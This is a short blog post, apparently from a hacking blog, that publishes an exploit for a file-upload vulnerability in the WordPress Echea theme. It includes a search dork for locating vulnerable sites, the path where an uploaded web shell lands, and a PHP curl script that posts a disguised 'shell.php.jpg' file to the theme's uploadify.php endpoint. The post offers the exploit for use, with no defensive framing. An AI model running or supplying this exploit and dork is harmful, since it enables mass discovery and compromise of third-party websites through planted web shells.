Home Unlabelled Exploit Wordpress: Echea Theme - File Upload Vulnerability

Exploit Wordpress: Echea Theme - File Upload Vulnerability

By
Thursday, May 15, 2014
Read
Add Comment

Dork: inurl:/wp-content/themes/echea/

Shell Uploaded to: 
http://www.site.com/wp-content/themes/echea/js/cufon-fonts/uploaded/custom_shell.php.jpg 

Exploit:

$uploadfile="shell.php.jpg";
$ch = curl_init("http://127.0.0.1/wp-content/themes/echea/js/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?> 
This exploit is the same as my previous post, so check it! :P


Tags :

Created By Nexus · Powered by Blogger
© All Rights Reserved

Terms Of Service · Privacy Policy · Disclaimer · Contact Us · About Us